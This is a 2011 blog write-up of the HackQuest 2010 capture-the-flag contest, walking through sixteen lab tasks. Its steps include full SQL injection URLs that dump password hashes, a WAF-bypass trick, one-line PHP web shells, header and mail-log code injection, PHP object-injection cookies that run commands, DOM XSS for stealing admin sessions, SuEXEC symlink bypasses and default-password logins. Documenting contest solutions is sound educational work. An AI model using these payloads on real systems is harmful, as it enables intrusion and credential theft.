Pages

Friday, April 1, 2011

Complete Guide to HackQuest 2010

This work contains the description of an algorithm to pass most stages of HackQuest 2010, which was held at the end of August within the scope of the Chaos Constructions 2010 festival and was available on-line in a shorter form in the end of 2010 on the basis of the SecurityLab portal.

Dmitry Evteev (Positive Technologies); http://devteev.blogspot.com/
Sergey Rublev (Positive Technologies); http://ptresearch.blogspot.com/
Alexander Matrosov (ESET); http://amatrosov.blogspot.com/
Vladimir d0znp Vorontsov (ONsec.RU); http://oxod.ru/
Taras oxdef Ivashchenko (Yandex); http://blog.oxdef.info/

Introduction

HackQuest 2010 is an open competition in the field of information security, the essence of which is to carry out a number of various tasks relating to information security: web hacking, social engineering, reverse engineering, etc. The contestants are given full scope for choosing the methods to cope with tasks. To capture one key (flag), it is necessary to exploit several vulnerabilities existing in real production system. Thus, the contestants can feel themselves to be real hackers :)

The competition results showed that many tasks proved to be too intricate for most contestants. The materials given in this work represent a complete guide to solve most tasks of HackQuest 2010.


Task #1: Classics

Preliminary network scanning allows one to find a web site of the Chaos travel agency. In the search section of this site, an error message issued by MySQL database allows one to reveal an insert-based SQL Injection vulnerability.


It should be mentioned that the site is protected with mod_security with standard rules. A vulnerable SQL query has the following form:

...
$query = "INSERT INTO indexes (text,source) value ('".$_GET['text']."',".$_GET['action'].")";
...

Thus, a query to conduct an attack can look as follows:

http://172.16.0.2/search.php?action=0&text=1'/*!%2b(select+1+from(select+count(*),concat((select+user()+from+information_schema.tables+limit+0,1),0x3a,floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)*/,0)--+

The query given above will display the identifier of the user whose account is used by the web application to interact with the database. How does it work?

1. A construction /*!...sql-code…*/ is used that allows one to execute SQL code bypassing standard rules of all mod_security versions (including the latest versions, see http://devteev.blogspot.com/2009/10/sql-injection-waf.html).

2. The symbol "+" (%2b) is used to work with strings (for details, see https://rdot.org/forum/showthread.php?t=60).

3. A universal method to transfer useful data in an error message (see http://qwazar.ru/?p=7) is applied:
select 1 from(select count(*),concat((select user()),0x3a,floor(rand(0)*2))x from information_schema.tables group by x)a

4. An SQL query is transformed into a syntactically valid expression by adding the construction ",0)"; the unnecessary part is cut off with two hyphens. To ensure that the end of the added query will be cut off at the web server, the spacing symbol "+" is used (in HTTP GET request, this symbol is equivalent to the space character).


It is required to obtain useful data from the database by developing the attack vector. For MySQL 5.x, it is rather simple, because in this version, there is a base information_schema that contains all necessary information about the DBMS structure. Thus, an attack using SQL Injection vulnerability comes to a standard set of queries.

http://172.16.0.2/search.php?action=0&text=1'/*!%2b(select+1+from(select+count(*),concat((select+table_name+from+information_schema.tables+where+table_schema!='information_schema'+and+table_schema!='mysql'+limit+0,1),0x3a,floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)*/,0)--+
...
Output contains the "admins" table.

http://172.16.0.2/search.php?action=0&text=1'/*!%2b(select+1+from(select+count(*),concat((select+column_name+from+information_schema.columns+where+table_name='admins'+limit+1,1),0x3a,floor(rand(0)*2))x+from+information_schema.columns+group+by+x)a)*/,0)--+
http://172.16.0.2/search.php?action=0&text=1'/*!%2b(select+1+from(select+count(*),concat((select+column_name+from+information_schema.columns+where+table_name='admins'+limit+2,1),0x3a,floor(rand(0)*2))x+from+information_schema.columns+group+by+x)a)*/,0)--+
Output contains the names of columns "login" and "password" from the table "admins".

http://172.16.0.2/search.php?action=0&text=1'/*!%2b(select+1+from(select+count(*),concat((select+concat_ws(0x3a,login,password)+from+admins+limit+0,1),0x3a,floor(rand(0)*2))x+from+admins+group+by+x)a)*/,0)--+
Output contains data from the table "admins" (username and MD5 hash of password).

After an MD5 hash is received, it is necessary to recover the password. The easiest way is to apply any free service of MD5 hash recovery using rainbow tables (e.g. http://www.xmd5.org).

After a username and a password are obtained, it’s time to apply them to some interface:) One can find a suitable interface in the file robots.txt located in the web server root directory. After administration panel is accessed, an error message is displayed that allows one to detect a Remote File Including (RFI) vulnerability easily. Exploitation of such vulnerabilities is a rather trivial problem that comes to the necessity to force the target application to request a file from the attacker server. In this scenario, an attacker prepares a file containing PHP code. Here is an example of the simplest code that allows one to execute operating system commands: <?php passthru($_REQUEST['c']);?>


After attackers get an opportunity to execute OS commands, it is necessary to copy the private RSA key of one of system users. Using the received RSA key, it is possible to access the system via SSH and then access the long-expected flag.

It is the sequence SQLi->RFI->RSA that gave the task its name "Classics".

Task #2: Not Classic

At the stage of network analysis, a web application relating to SMS services can be found (similarly to the application in the previous task). A cursory analysis of this application allows one to detect a selection-based SQL Injection vulnerability in the PostgreSQL database:

http://172.16.0.4/index.php?r=recovery&name=1&email=1&status=cast(version()+as+numeric)

The given query will output the used database version in an error message. It works, because firstly, the application returns a DBMS error message to the user and secondly, the string data type is reduced to the numeric one. It is possible to recover the DBMS structure easily using the information_schema base (which is similar to MySQL 5.x).

http://172.16.0.4/index.php?r=recovery&name=1&email=1&status=1;select(select+table_name+from+information_schema.tables+limit+1+offset+0)::text::int--
http://172.16.0.4/index.php?r=recovery&name=1&email=1&status=1;select(select+table_name+from+information_schema.tables+limit+1+offset+105)::text::int--
Output contains the "vsmsusers" table.

http://172.16.0.4/index.php?r=recovery&name=1&email=1&status=1;select+(select+column_name+from+information_schema.columns+where+table_name=chr(118)||chr(115)||chr(109)||chr(115)||chr(117)||chr(115)||chr(101)||chr(114)||chr(115)+limit+1+offset+1)::text::int--
Output contains the names of columns "login" and "password" from the table "vsmsusers".

Following a hint that there was the millionth user registered in the system who receives a special reward, it is necessary to access just this user’s account (it is notable that the contestants kept ignoring this hint and downloaded the whole table of users trying to create this trump millionth user). After the "lucky user" interface is accessed, one can notice another interface, which contains a File Including vulnerability (to be more precise, Local File Including/LFI). Exploitation of this vulnerability is complicated with the fact that length of incoming requests is verified; if it is not equal to 16 characters, then this request doesn’t get to the function include(). To execute OS commands, one should use the shortest PHP web shell (see http://raz0r.name/releases/mega-reliz-samyj-korotkij-shell/):

http://172.16.0.4/index.php?u=LV89284&p=data:,<?=@`$c`?>&c=ls

The following considerations are taken into account:
1. Application of stream wrappers ("data" appeared in PHP version 5.2.0)
2. short_open_tag и register_globals in the state "ON"
3. <?= ?> is equivalent to <? echo ?>;
4. Application of back quotes is equivalent to application of shell_exec()


After attackers get an opportunity to execute commands on server, they should obtain the list of system users (/etc/passwd) and then match system user passwords by applying any tool of Telnet password cracker (e.g. THC-Hydra, Medusa, or ncrack). Brute force method allows one to reveal a user whose password is equal to his/her identifier. Access via Telnet with privileges of this user will allow attackers to obtain the next flag contents.

Task #3: Self-Written Web Server

A rather simple vulnerability can be found in the web server that the CrackMe task was implemented on. It was one of the easiest HackQuest 2010 tasks, which required revealing a path traversal vulnerability (web server root directory overrun). This vulnerability is easy to detect automatically using appropriate tools (that’s why the final results of on-line competition are so alerting, see http://www.securitylab.ru/hq2010/list.php). To exploit the vulnerability, it is sufficient to send a request of the following type to the web server: "GET /../../../root/.history HTTP/1.1". After receiving the history of commands entered by the administrator, attackers can easily get the next flag by applying special "console magic".


Task #4: Public Bulletin Board

In the game network, there is a web application that emulates operation of a public bulletin board. After gaining access to the application source code (for this purpose, it is necessary to refer to index.bak), attackers can restore the entire logic of application operation, which consists in the following scheme: if a user tries to send more than one message per minute, then his/her IP address is added to the black list (the file blacklist.php). A vulnerability is caused by the fact that the application checks the web server environment variable HTTP_X_FORWARDED_FOR; if this variable is set, then the contents of the browser header X-Forwarded-For instead of the IP address is added to the black list without any verification (this idea was borrowed from the CuteNews application).


Exploitation of this vulnerability comes to setting a string like given below as the X-Forwarded-For header: ';?><?eval($_GET['cmd']);?><?$a='. After attackers get an opportunity to execute commands on the server and read the history of commands entered by the administrator, they can find the cherished key.

Task #5: Cross-Site Scripting

When it comes to XSS attacks, most people usually remember ordinary reflected and stored XSS and only sometimes they think of so-called DOM-based XSS attacks (see http://www.owasp.org/index.php/DOM_Based_XSS). Meanwhile, the latter are known at least since 2005, when they were described in an article by Amit Klein (see http://www.webappsec.org/projects/articles/071105.shtml). In short, this type of XSS attacks is based on the idea that input web application data is received and used for DOM modification on the side of a web browser in the JavaScript context. Thus, the HTTP response of the web server is not modified! A classic example of such vulnerability is given below:

...
Select your language:
<select><script>
document.write("<OPTION value=1>"+document.location.href.substring(document.location.href.indexOf("default=")+8)+"</OPTION>");
document.write("<OPTION value=2>English</OPTION>");
</script></select>
...

Vulnerability exploitation consists in transferring JavaScript payload in the default parameter as shown below:

http://www.some.site/page.html#default=<script>alert(document.cookie)</script>

Everything would be easy and simple, but vendors of modern web browsers decided to secure their users. Therefore, address parameters are transferred to the JavaScript context in the URL-encrypted form, which adds problems to attackers and makes exploitation not that trivial. Unfortunately, this protection method is not sufficient, because there are various ways to use address parameters beside the one described above. Moreover, as web applications develop (more and more logic is moved to the web browser side) this type of Cross-Site Scripting is to be reborn. But let us return to the task. It was implemented as a clone of a popular microblogging service.


Let’s open and analyze the HTML code of the main page. At the very end of the code text, one can notice a vulnerable code fragment with a visit counter:

...
</div>
<script>
document.write(unescape('%3Cimg%20src%3D%22/img/stat.png?site='+document.location.href+'%22%3E'));
</script>
</div>
</body>
</html>
...

Further actions are obvious: let’s hijack the service administrator session, which is to all appearance actively used by him/her. For this purpose:

1. Register a new user.
2. Send a personal message containing a link with JavaScript payload to the administrator (e.g. sending cookies to a specially prepared sniffer).
3. The administrator clicks the links in messages with no doubt ;)
4. After hijacking the administrator session, one can find the next necessary key in personal messages.
5. Profit!!11

Task #6: Hosting

When analyzing the game network, one can find a server that has the default page of Apache web server on the port 80 and serves as an SMTP and DNS server. To find out what sites are served by this web server, it is necessary to transfer the DNS zone. But what zone? Answer to this question can be obtained from the reverse DNS zone, which is also served by this server.

Find out the DNS suffix used by the web server: dig @172.16.0.10 PTR 10.0.16.172.in-addr.arpa
Transfer the DNS zone: dig @172.16.0.10 cc10.site axfr

Then, it is necessary to configure application of this DNS server (or write appropriate names to the file hosts). After a cursory glance at available sites, one can find a Local File Including vulnerability on the site of Vasily Pupkin. To exploit it and develop the attack, an SMTP daemon should be used as the transport to transfer useful payload (see http://www.xakep.ru/post/49508/default.asp). For example, it can be implemented in the following way:

telnet 172.16.0.10 25
ehlo cc10.site
mail from:any@cc10.site
rcpt to:vasya
data
<?php passthru($_GET['cmd']);?>
.
ENTER

After some voodoo manipulations with the SMTP daemon are performed, it becomes possible to execute operating system commands:

http://vasya.cc10.site/index.php?file=/var/mail/vasya&cmd=ls -la /


However, it is necessary to perform some more actions to obtain the flag after the server is accessed, because the Apache web server uses a module SuEXEC, which isolates access to adjacent server sites. To bypass the described restrictions, apply symbolic links (see http://www.kernelpanik.org/docs/kernelpanik/suexec.en.pdf). It is possible just because the directive AllowOverride All is used in the web server configuration.

Further attack process comes to performing the following queries:

1. Enable application of symbolic links by redefining the settings of vasya.cc10.site site directory
echo Options +FollowSymLinks > /usr/local/www/data/vasya/.htaccess

2. Access the directory of the site containing the game flag
ln -s /usr/local/www/data/root/.htaccess /usr/local/www/data/vasya/test.txt

3. Access the file containing data to be authenticated on the site r00t.cc10.site
ln -s /usr/local/www/data/root/.htpasswd_new /usr/local/www/data/vasya/passwd.txt

4. Decrypt the obtained MD5 hash (e.g. using PasswordsPro or John the Ripper)
5. Access the contents of the site r00t.cc10.site and obtain the next game key.


Task #7: Turbid Web

In the game network, one can find a web application that requires user authentication, but seems to contain no vulnerabilities at the first sight. The complexity of the first stage of this task consists in searching for parameters incoming to the application and hidden behind Mod_rewrite. It should not cause any difficulties for jedis who have read the publication "Fuzzing the sites protected with mod_rewrite" (see http://www.securitylab.ru/analytics/399778.php). By applying the scenario of parameter search proposed in this article (http://www.ptsecurity.ru/download/modrewrite_search.zip), one can restore the real structure of the web application in a matter of seconds.


The matched parameter "pag" is vulnerable to classic Blind SQL Injection. Some complications can arise only to those contestants who use Mozilla Firefox 3.x (as is), because the transferred data is converted to URL-encoded equivalents in this browser branch.

It should be also mentioned that it is necessary to match the names of DBMS table columns to conduct a Blind SQL Injection attack (the reason is that there is no information_schema base in MySQL 4.x). Eventually, the contestants can receive a system user identifier and MD5 password hash, which is easy to recover by applying rainbow tables.

Thus, access to the application interface includes access to the application backup. Consequently, web application analysis turns from black box into grey box at this stage.
At this stage, an intent contestant will pay attention to the following construction:

RewriteRule ^([0-9]*)\.php ./index.php?pag=$1 [L,QSA]

in the file .htaccess. If one remembers HTTP Parameter Pollution (see http://www.owasp.org/images/b/ba/AppsecEU09_CarettoniDiPaola_v0.8.pdf), then he/she will be able to access the game key using the following query:

http://172.16.0.6/1/?access=admin

Moreover, this story can be continued. When analyzing the web application source code, it is necessary to pay attention to the following fragment:

...
echo $pages['adminka'];
$sessid = unserialize($_COOKIE['admin_id']);
...
...
function __destruct(){echo $this->shutdown;
if (!empty($this->shutdown)){
$var = $this->shutdown[0];
$arg = $this->shutdown[1];
$var($arg);
...

Does it resemble you something? But it is an actual backdoor using serialization! To be able to understand the essence of what follows, it is recommended to view the materials of publications http://www.xakep.ru/magazine/xa/133/048/1.asp, http://www.slideshare.net/i0n1c/syscan-singapore-2010-returning-into-the-phpinterpreter and http://oxod.ru/?p=244.

In our task, if the cookie variable named "admin_id" contains the following line:

O:8:"Database":1:{s:8:"shutdown"%3Ba:2:{i:0%3Bs:7:"phpinfo"%3Bi:1%3Bs:2:"-1"%3B}}

then the function phpinfo() will be executed. Attack development allows one to execute commands on the server, for example:

O:8:"Database":1:{s:8:"shutdown"%3Ba:2:{i:0%3Bs:8:"passthru"%3Bi:1%3Bs:8:"ls -la /"%3B}}

After that, it is easy to find the next game flag following the intuition.

Task #8: Positive PDF

One of the HackQuest 2010 tasks invites contestants to analyze a positive PDF file that refers to the web application using built-in encryption algorithms. Special markers indicate that a flash object is embedded into the PDF file.


Then, one can notice a special marker and conclude that a SWF object is embedded into the PDF file using ZLIB compression and therefore the pure SWF file can be obtained, for example, using Python library zlib.


The next stage is to recover the algorithm of generating a request to the web application on the basis of the received SWF file. For this purpose, one can apply the utility swfdump from the packet swftools. Special attention should be paid to the function Obfuscate; it is this function that is used to generate a request to the server.


The key that is used for encryption can be restored from the following code fragment:

00016) + 0:0 getlocal_0
00017) + 1:0 pushint 170
00018) + 2:0 pushint 42
00019) + 3:0 pushint 52
00020) + 4:0 pushint 120
00021) + 5:0 pushint 178
00022) + 6:0 pushint 249
00023) + 7:0 pushint 255
00024) + 8:0 pushint 228
00025) + 9:0 pushint 80
00026) + 10:0 pushint 32

When the encryption key and algorithm are known, then it is possible to generate arbitrary requests to the web application. To gain the next game flag, it is necessary to generate a request to the web application using elementary method of SQL Injection vulnerability exploitation.

Task #9: Creative PDF

On the basis of the much-talked-of incident described in the Full-Disclosure:
http://seclists.org/fulldisclosure/2009/Nov/240,
we developed an idea to locate a PDF document with a direct path to the game flag contained in its meta-data somewhere in the game network.

When implementing this task, everything was naturally performed just as an experienced secretary would do:

1. A trial version of Adobe Livecycle Designer was downloaded.
2. A directory D:\CC10\flag\CC10_ABCDEFGHIJKLMNOLP was created.
3. A new document was created via Livecycle Designer with the only page containing an inviting phrase "The flag is there".
4. After that, the file was saved into the created directory.

To check the task, it remained only to examine the metadata in the document. At first, the basic features of Adobe Reader were applied. It was experimentally shown that the hidden flag is not conspicuous. If it is, the task would be too easy for the contestants, while we intended to develop a task to try their gumption.

After that, it was decided to solve the obtained task to make sure that it is not impracticable and we’re not playing a mean upon the contestants. The easiest way is to parse the document with any free library (e.g. iText http://sourceforge.net/projects/itext/files/ for Java).

The following function was written:

public static boolean getAllDataFromPdfToFile(String src,
String dest) {
try {
PdfReader reader = new PdfReader(src);
XfaForm xfa = new XfaForm(reader);
Document doc = xfa.getDomDocument();
Transformer tf = TransformerFactory.newInstance().newTransformer();
tf.setOutputProperty(OutputKeys.ENCODING, "UTF-8");
tf.setOutputProperty(OutputKeys.INDENT, "yes");
FileOutputStream os = new FileOutputStream(dest);
tf.transform(new DOMSource(doc), new StreamResult(os));
reader.close();
return true;
} catch (Exception e) {
e.printStackTrace();
return false;
}
}

This function worked perfectly; the flag path could be found not even in one, but in three tags. One can see there is nothing extremely complicated here :) It was much more difficult to find this "charged" PDF file...

Task #10: Steganography

Steganography is the art and science of writing hidden messages in such a way that no one, apart from the sender and intended recipient, suspects the fact of transferring the message. In contrast to cryptography which hides the contents of confidential messages, steganography hides the existence of such messages. In the digital world, containers of hidden information are usually presented with multimedia objects (images, video, audio, 3D object texture, etc.) with introduced distortions that are below the sensitivity threshold of an average person and do not considerably modify these objects. However, as one can suspect, these are not only multimedia files that can serve as containers. In the considered case, HTML code serves as one. The deal is that web browser ignores sequential space characters when rendering a page(if they are not specified as HTML mnemonics). Thus, two or more space characters are interpreted as one. The same is valid for tabs and line feed characters. It was a brief theory excursus.


The task presents an HTML page with the Conscience of a Hacker (a sin and a shame on you, %username%, if you haven’t read this Mentor epistle!) that can be found in the game network. We surmised the difficulty of discovering the task specificity and thoughtfully added a hint to the HTML code that pointed that space characters can serve not only as word separators in sentences. An attentive contestant can notice that words in the text are separated differently.


To be more concrete, one space character is nothing else but "0" and double space character is "1". In other words, it is one data bit. 8 bits form one byte which can be interpreted as an ASCII character code. Message terminator is presented with the sequence of a space character and a tab. The task was complicated with realization that it is not another attempt to promote hacking, but this ordinary static HTML page itself presents the task and a hidden key should be found in it.

Task #11: LUA CrackMe

When preparing this task, the goal was to develop a simple crackme that a person who is not very skilled in reverse engineering would be able to solve. It should be noticed that this goal wasn’t achieved in full. According to contestants’ response, many of them even didn’t manage to run the program; at least, the RDOT.ORG team which coped with the task didn’t run it ;) Well, let’s tell it like it is.

Lua code that receives a key as the only argument from the console was taken as the basis. If the key is not valid, then an error message is displayed; otherwise, the 1337 string is displayed.

The key validation code was written poorly. At first, a pair of substring coincidences like "CC10_" prefix is checked, then – a pair of bytes from the flag is checked. After that, the checksum of the entire key is calculated and compared with the constant.

Of course, the solution is multiple-valued. But on the whole, if the key flag characters are restricted to ASCII there seems to be not so many variants. The system accepted only one answer, so we had to brute-force the script of flag accepting ;) Now, let’s talk about a catch... The catch was that the crackme was assembled under the latest interpreter version 5.2 which was not included into the updates, but was available only on the web site. Naturally, such byte code will not operate under the most popular Lua version 5.1. It was supposed that the contestants would show their gumption and find an interpreter version that allows one to run the byte code properly (taking into account that there have been 13 versions released: www.lua.org/versions.html).

Actually, many things were made for the version 5.1. For example, there is a public decompiler which crashes when trying to process the mentioned code under a higher version. One can understand much about the algorithm just by reading the file via a hex editor. Well, that’s all about this task :)

Task #12: CrackMe

The crackme was initially developed so that it would only take several hours at most to solve it for a person who is no stranger to reverse engineering and who has carefully studied the task. The first obstacle was presented with a rather simple packer BeRoEXEPacker (first version).


It seems to be unnecessary to consider unpacking in details, because there is enough material on this topic; furthermore, there are a lot of public unpackers available for lazy attackers. Therefore, let’s proceed to passing the first stage. It should not have caused any difficulties even for those who have little to do with reversing, because it was only necessary to find an unencrypted string constant. However, to make the task not as easy, we introduced several anti-debugging methods :) By the way, we didn’t expect that the trick with FindWindow would prove to be so mind-blowing for untrained people. It is hard to count up how many contestants decided that this task didn’t work at all.


Nevertheless, a cursory examination of the unpacked file damp allows one to notice the following code fragment:


If you take a look at the origin of this checking function, then everything clicks into place, because the value to check comes from CWnd::GetWindowTextW(). Hurrah, the first stage is complete, let’s go further.

If an inquisitive investigator will analyze what code fragments surround the first constant, then he/she will notice an interesting string Q0MxMFNfNzhiNmVmZDI4OWQ4YzZmYTY3MTk3N2Q3ZmYwZmVhYTA=. Most contestants who reached this stage had a feeling that it is Base64; and these people were absolutely right!


Decoding gives us a string CC10S_78b6efd289d8c6fa671977d7ff0feaa0, which opens the gate to the third stage.

Here, it is more difficult, but still possible. The main window disappears and a UDP socket is generated on the port 696. It is easy to find a CAsyncSocket::Create() call in the code; after that, one can see that when data is received it is interpreted.


From the decompiled code logic, it can be seen that only two commands are meaningful. These commands are keys and more; after that, let’s remember of write down the value 7812D9E (we can conjecture that it was placed here not by accident) and execute the command more. Then, the contestants should take an interest in the CWinThread::CreateThread() call that injects code taken from the resource section.


Let’s save files from the resources and try to run them. After the first file is run, an interesting widow is displayed that makes it clear why it was necessary to remember the constant from the keys output.


Let’s run the second file; a window with the following contents is displayed:


We already have two keys, now we need to obtain the encrypted string itself. After a cursory analysis, it becomes clear that the application is implemented with Visual Basic 6. Let’s find a decompiler for this programming language and analyze the files. A short search gives us the last cherished key.

Task #13: Cisco

Besides the honeypots emulating network devices and various operating systems, there was a real router based on Cisco IOS in the game network. Scanning of TCP ports shows that a FINGER service is available. One can receive the name of a user registered on the device by calling this service. After that, it is sufficient to try this username with the password "cisco" (the default password for Cisco devices) on the TELNET port. The next step is to gain additional privileges on the device. Of course, the 15th access level is not required :) But the third one is achievable with the password "cisco". At this stage, the user already has enough privileges to view the current information. It is possible to obtain the device configuration along with a game flag by applying the following command:

Router#show running-config view full


Task #14: TFTP

The task relating to TFTP was one of the simplest tasks that could be found in the game network. However, it proved to be rather difficult for most contestants to cope with it without any hints. To solve this task, it is necessary to find an available TFTP service (69/UDP) and then match the name of the file stored on this service resource. It was this matching that caused most difficulties for the contestants. The file name to match was "router-config"; it is the default name of the file that is created when copying configuration from the console of hardware based on Cisco IOS. It is notable that the vocabularies of vulnerability detection systems and even specialized tools such as tftptheft do not contain the necessary name "router-config".


If the file is still obtained, then there are no problems with finding a game key in it. The key is stored in the password format "secret 7" and can be recovered with various tools (e.g. Cain&Abel).

Task #15: Active Directory

The task relating to Active Directory caused totally unexpected difficulties for the contestants. May be it’s because the contestants are better oriented to solving problems relating to web security and reversing, but not to the enterprise systems.

To solve this task, it is necessary to match the password for the OS Windows user identifier at first; for a domain controller with default configuration, it is equal to gaining access to the LDAP directory. It isn’t difficult to match a pair login/password (test/test) via SMB; most contestants coped with this stage. It is the next step that caused the difficulties.


After reading access to Active Directory is gained, it is necessary to analyze discretionary access control lists (DACLs). As one of the contestants, Jokester, said during brainstorming, it allowed them to reveal that "our friend Lena (EAntonova) has a friend Stepan (SFrolov) who has the same privileges as test, but is also specified in the Lena’s Security tab with the only right “reset password”". Meanwhile, Lena (EAntonova) has access to the domain controller via RDP. Analysis of the gathered information makes it obvious that it’s necessary to gain access to the Stepan (SFrolov) account, which has some primitive password, e.g. "12345678". Well, what was the problem?

The deal is that it is possible to log on using the SFrolov account only from the computer SFrolov-nb. Many contestants who know much about Active Directory (and Microsoft networks) could see this restriction of access from a definite computer and conclude that a domain computer with this name is meant here. However, it’s wrong. When such restriction is applied to an account in Active Directory, it is the computer NETBIOS name that is verified during authentication to domain resources. Thus, one can assign the name SFrolov-nb to his/her computer and gain privileges of the user SFrolov without any obstruction. After that, it is possible to change the password of EAntonova and access the domain controller via RDP using the new password. A game flag can be found in a text file on the desktop.


Task #16: Applying the On-Site Effect

This task was the apogee of imagination for summer 2010 ;) The idea occurred to us on the eve of August 16 and implementation dragged on till the beginning of Chaos Construction and was finished after the HackQuest 2010 competition had started. Well, let’s begin with the letter written the morning before:

From: d0znpp [mailto:d0znpp@onsec.ru]
Sent: Monday, August 16, 2010 5:53 PM
To: ...
Subject: Re: social engineering

It’s very good that the contestants are sent to the street and farther for several times during the quest; they shouldn’t seat in front of their computers all the time.
A hacker should be able to rummage in rubbish and find useful documents in a batch of documents of the target organization.
So there will be a rubbish heap with a batch of documents in the place with the given coordinates ;))) All in keeping with the best traditions.

On Mon, 16 Aug 2010 17:46:40 +0400, "Dmitry Evteev"

To implement the task, a site of ZAO BezopasnySoft (SecureSoft) was created (by the way, there is no company with such name ;) The site presents a static HTML page. News, vacancies, and even partners were added to the site to make it more realistic. Actually, one of the two available news messages contains a picture illustrating how the company utilizes its documents; to be more precise, it’s a picture of a rubbish heap near the building where the fest takes place. The photo was taken with standard equipment – a cell phone based on Android with enabled GPS receiver and function of stating coordinates in EXIF data. Subsequently, it turned out that Petersburgers know every refuse bin in their home city by sight, so the contestants found it even without any GPS coordinates. It should be mentioned, that the chosen rubbish bin is really located near the building where the demo party took place. To plead for myself, I can add that it was cold outside though it was summer and there were no other decent rubbish bins within a radius of 1 kilometer of the building. I say "decent", because there was a requirement of relative cleanness of the rubbish bin; we didn’t want the contestants to rummage in real slops.

A waste-paper bin would be the optimal solution, but we didn’t manage to find any near the building. Anyway, we had a relatively clean rubbish bin full of paper to the brim after a while. The major part of papers was presented with printouts of anything; additionally, several Hacker magazines distributed for free during the fest were rent...

Among these pieces, there were several useful printouts. They contained the source code of some PHP application with an SQL Injection vulnerability. In the commentary to the code, an IP address of the application to attack was specified (but even this information didn’t help anyone to cope with the considered task).

Now, let’s talk about the vulnerability. For HackQuest 2010, it was decided not to apply hackneyed methods even if the task contains classical attack elements (in such cases, some ruse was included into the task). In the considered task, a vulnerability of the function sqlite_escape_string is used; this function doesn’t filter double quotes. It is a Blind SQL Injection vulnerability, so one can apply classical methods and receive any data from the database tables. One of the tables with "secret" one-time passwords contains a flag.

Competition Contestant Opinions

HackQuest 2010 was an interesting competition that offered various problems in different fields to the contestants. To pass the quest, a team from the rdot.org forum was called. This team consisted of people who specialize in different fields. It allowed us to pass the quest completely and finish earlier than all other contestants. The difficulty levels of the tasks were different, but there were no easy problems. To gain any key, it was necessary to show good knowledge in some information security field. If a task was standard, the organizers added some zest to it. DoSs were unavoidable because of multiple attacks against the game servers, but thanks to the organizers, the servers returned to the battlefield fast :) We enjoyed participating in this competition and we hope that it will be conducted the next year even with a grater bang.

https://rdot.org/forum/showpost.php?p=12395&postcount=36

Instead of conclusions

Thanks to all the HQ2010 participants! Thanks to the HQ2010 developers who made the competition so replete and interesting. Special thanks to Timur Yunusov, Sergey Pavlov, and Valery Marchuk. We also want to thank all organizers and sponsors (ESET and SecurityLab) that made it possible to conduct such event.

See you soon on the future hackquests!

No comments:

Post a Comment